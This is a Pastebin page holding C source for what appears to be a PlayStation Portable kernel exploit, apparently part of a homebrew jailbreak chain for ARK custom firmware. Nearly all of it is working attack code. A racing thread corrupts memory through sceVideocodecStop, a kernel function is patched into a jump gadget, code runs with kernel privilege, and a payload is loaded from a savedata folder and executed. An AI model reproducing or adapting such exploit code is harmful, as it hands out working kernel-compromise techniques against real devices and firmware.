SHARE
TWEET

Untitled

a guest Feb 21st, 2015 2,144 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #include <pspkernel.h>
  2.  
  3. u32 sceMeCodecWrapper = 0x88136800, sw_address = 0;
  4. int is_exploited = 0, running = 1;
  5. u32 a0[24];
  6.  
  7. int storethread()
  8. {
  9.         while (running == 1) {
  10.                 a0[11] = sw_address;
  11.                 sceKernelDelayThread(1);
  12.         }
  13.  
  14.         sceKernelExitThread(0);
  15. }
  16.  
  17. void KernelContent()
  18. {
  19.         is_exploited = 1;
  20.  
  21.         __asm("move $k1, $0;");
  22.  
  23.         //"restore" me_wrapper mutex UID
  24.         SceUID (* _sceKernelCreateMutex)(const char *name, u32 attr, int init_count, void *options) = \
  25.                 (void *)FindExport("sceThreadManager", "ThreadManForUser", 0xB7D098C6);
  26.  
  27.         SceUID mutex = _sceKernelCreateMutex("SceKermitMe", 256, 0, NULL);
  28.  
  29.         _sw(mutex, sceMeCodecWrapper + 0x2F80);
  30.  
  31.         //sceKernelLibcTime - pass address of kernel function in first arg, restored later in ARK code. |:
  32.         _sw(0x00800008, 0x8800F9C4);    //jr    $a0
  33.         _sw(0, 0x8800F9C8);             //nop
  34.  
  35.         void (* _sceKernelDcacheWritebackInvalidateAll)(void) = (void *)0x88000744;
  36.         void (* _sceKernelIcacheInvalidateAll)(void) = (void *)0x88000E98;
  37.  
  38.         _sceKernelDcacheWritebackInvalidateAll();
  39.         _sceKernelIcacheInvalidateAll();
  40. }
  41.  
  42. void do_exploit()
  43. {
  44.         is_exploited = 0;
  45.         running = 1;
  46.  
  47.         sw_address = (sceMeCodecWrapper + 0x2F80) - 36;
  48.  
  49.         SceUID thid = sceKernelCreateThread("thid", storethread, 8, 512, THREAD_ATTR_USER, NULL);
  50.         sceKernelStartThread(thid, 0, NULL);
  51.  
  52.         sceUtilityLoadModule(0x300);
  53.         sceUtilityLoadModule(0x303);
  54.  
  55.         int (* sceVideocodecStop)(u32 *a0, int a1) = (void *)FindImport("sceVideocodec", 0xA2F0564E, 0);
  56.  
  57.         memset(a0, 0, sizeof(a0));
  58.  
  59.         a0[0] = 0x05100601;
  60.         a0[15] = 1;
  61.  
  62.         int i;
  63.  
  64.         while (a0[2] != 0x800201C3) {
  65.                 a0[15] = 1;
  66.                 a0[3] = 0x09000000;
  67.                 a0[4] = 0x09000000;
  68.                 a0[2] = 0;
  69.                 a0[11] = 0x09000000;
  70.  
  71.                 sceVideocodecStop(a0, 0);
  72.         }
  73.  
  74.         fillvram(-1);
  75.  
  76.         sw_address = 0x8800F9C4 - 36;
  77.  
  78.         int (* _sceKernelLibcTime)(u32, u32) = (void *)sceKernelLibcTime;
  79.  
  80.         while (is_exploited != 1) {
  81.                 a0[15] = 1;
  82.                 a0[11] = 0x09000000;
  83.                 a0[3] = 0x09000000;
  84.                 a0[4] = 0x09000000;
  85.  
  86.                 sceVideocodecStop(a0, 0);
  87.  
  88.                 sceKernelDcacheWritebackAll();
  89.  
  90.                 _sceKernelLibcTime(0x08800000, ((u32)&KernelContent | 0x80000000));
  91.         }
  92.  
  93.         fillvram(0xFF00);
  94.  
  95.         running = 0;
  96.  
  97.         u8 buf[0x4000];
  98.  
  99.         SceUID fd = sceIoOpen("ms0:/PSP/SAVEDATA/NPUG80320KEXPLOIT/ARK.BIN", PSP_O_RDONLY, 0777);
  100.         sceIoRead(fd, buf, sizeof(buf));
  101.         sceIoClose(fd);
  102.  
  103.         memcpy((void *)0x10000, buf, sizeof(buf));
  104.  
  105.         sceKernelDcacheWritebackAll();
  106.  
  107.         void (* Start)(const char *) = (void *)0x10000;
  108.         Start("ms0:/PSP/SAVEDATA/NPUG80320KEXPLOIT/");
  109. }
  110.  
  111. void _start() __attribute__ ((section (".text.start")));
  112. void _start()
  113. {
  114.         fillvram(0x80808080);
  115.         do_exploit();
  116.         sceKernelExitGame();
  117. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top